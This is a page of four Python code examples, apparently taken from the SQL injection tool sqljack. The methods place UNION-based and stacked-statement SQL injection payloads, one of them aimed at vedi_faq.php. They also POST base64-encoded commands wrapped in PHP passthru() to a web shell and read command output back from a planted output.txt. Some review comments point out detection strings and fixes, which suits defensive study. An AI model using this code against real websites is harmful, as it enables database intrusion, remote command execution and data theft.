Esempio n. 1
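 def get_output(self):
     """Fetch ``output.txt`` next to ``self.url`` and return the text after the marker.

     The response body is searched for ``self.mark_rand`` followed by optional
     whitespace; everything after that point is captured (newlines included,
     because of ``re.DOTALL``).

     Returns:
         The captured text, or ``""`` when the marker does not occur in the
         response.
     """
     # os.path.split() on a URL drops the last path segment, leaving the
     # "directory" part of the address.
     basedir = os.path.split(self.url)[0]
     out = libsqljack.send_web_request("%s/output.txt" % basedir)
     # Raw string: "\s" in a normal literal is an invalid escape sequence.
     # re.escape: the marker is matched literally even if it ever contains
     # regex metacharacters.
     pattern = r"%s\s*(.*)" % re.escape(self.mark_rand)
     found = re.search(pattern, out, re.DOTALL)
     # NOTE(review): presumably output.txt is written under the web root by an
     # earlier step -- confirm against the caller. For defenders, an unexpected
     # output.txt beside application scripts and repeated GETs for it are the
     # observable artifacts of this method.
     return found.group(1) if found else ""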
Esempio n. 2
 def get_output(self):
     """POST ``self.cmd`` to ``<basedir>/<self.filename>`` and return the response.

     ``<basedir>`` is ``self.url`` with its last path segment removed.

     Returns:
         ``False`` when ``self.pathok`` is falsy (no request is made),
         otherwise whatever ``libsqljack.send_web_request`` returns.
     """
     if self.pathok:
         target = "%s/%s" % (os.path.split(self.url)[0], self.filename)
         # The command is base64-encoded and wrapped in a PHP passthru() call
         # carried in the ``cmd`` form field.
         # NOTE(review): presumably the script at ``self.filename`` evaluates
         # that field server-side -- confirm. For defenders, POST bodies with a
         # ``cmd`` field starting "passthru(base64_decode(" are a direct
         # signature of this request.
         form = {'cmd': "passthru(base64_decode('%s'));" % base64.b64encode(self.cmd)}
         return libsqljack.send_web_request(target, form)
     return False
Esempio n. 3
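 def place_payload(self, payload):
     """Send ``payload`` to ``self.url`` in the ``pwn`` POST field.

     Args:
         payload: mapping; ``"mssql_exec"`` is checked first, then
             ``"mssql_inject"``.

     Returns:
         ``True`` once the request has been sent (the response is stored in
         ``self.result``); ``False`` when neither key is present, after
         logging an error.
     """
     # ``in`` replaces dict.has_key(), which does not exist in Python 3.
     if "mssql_exec" in payload:
         # Stacked-statement form: the value follows "2;".
         field = '2;%s' % payload["mssql_exec"]
     elif "mssql_inject" in payload:
         # UNION form: the value becomes the select list.
         field = '-1 union select %s' % payload["mssql_inject"]
     else:
         self.log.error("Failed to place payload.")
         return False
     # NOTE(review): both forms only have an effect if the receiving page
     # concatenates ``pwn`` into a SQL statement; binding it as a query
     # parameter on the server side neutralises them, and the literal
     # prefixes above are usable as detection strings.
     self.result = libsqljack.send_web_request(self.url, {'pwn': field})
     return True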
Esempio n. 4
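 def place_payload(self, payload):
     """Send ``payload`` to ``<self.url>/vedi_faq.php`` in the ``id`` POST field.

     Args:
         payload: mapping; ``"mysql_exec"`` is checked first, then
             ``"mysql_inject"``.

     Returns:
         ``True`` once the request has been sent (the response is stored in
         ``self.result``); ``False`` when neither key is present, after
         logging an error.
     """
     # ``in`` replaces dict.has_key(), which does not exist in Python 3.
     if "mysql_exec" in payload:
         field = ";%s" % payload["mysql_exec"]
     elif "mysql_inject" in payload:
         # The template uses SQL inline comments (/**/) where spaces would
         # normally go; the value lands in the second of four columns.
         template = '-1/**/union/**/all/**/select/**/1,%s,3,4/**/--/**/C'
         field = template % payload["mysql_inject"]
     else:
         self.log.error("Failed to place payload.")
         return False
     # NOTE(review): this only has an effect if vedi_faq.php concatenates
     # ``id`` into its query; a bound parameter or an integer cast on the
     # server side closes it. Detection rules should normalise inline
     # comments before matching on "union ... select".
     vuln = "%s/vedi_faq.php" % (self.url)
     self.result = libsqljack.send_web_request(vuln, {'id': field})
     return True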